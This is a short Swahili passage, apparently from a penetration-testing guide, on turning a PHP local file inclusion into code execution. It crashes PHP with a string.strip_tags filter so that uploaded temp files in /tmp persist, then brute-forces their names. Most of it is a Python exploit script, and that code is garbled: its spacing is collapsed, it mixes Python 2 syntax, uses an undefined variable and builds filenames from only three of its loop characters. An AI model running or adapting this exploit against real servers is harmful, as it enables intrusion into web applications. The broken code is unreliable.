Unapaswa kujua kwamba ikiwa unatuma ombi la POST lenye faili, PHP itaunda faili ya muda katika /tmp/php<kitu> na maudhui ya faili hiyo. Faili hii ita futwa moja kwa moja mara ombi litakapoprocess.
Ikiwa unapata LFI na unafanikiwa kuzindua kosa la kugawanyika katika PHP, faili ya muda haitafutwa kamwe. Kwa hivyo, unaweza kuitafuta kwa kutumia udhaifu wa LFI hadi uipate na kutekeleza nambari yoyote.
# upload file with segmentation faultimport requestsurl ="http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"files ={'file':open('la.php','rb')}response = requests.post(url, files=files)# Search for the file (improve this with threads)import requestsimport stringimport threadingcharset = string.ascii_letters + string.digitshost ="127.0.0.1"port =80base_url ="http://%s:%d"% (host, port)defbruteforce(charset):for i in charset:for j in charset:for k in charset:for l in charset:for m in charset:for n in charset:filename = prefix + i + j + kurl ="%s/index.php?i=/tmp/php%s"% (base_url, filename)print urlresponse = requests.get(url)if'spyd3r'in response.content:print"[+] Include success!"returnTruedefmain():bruteforce(charset)if__name__=="__main__":main()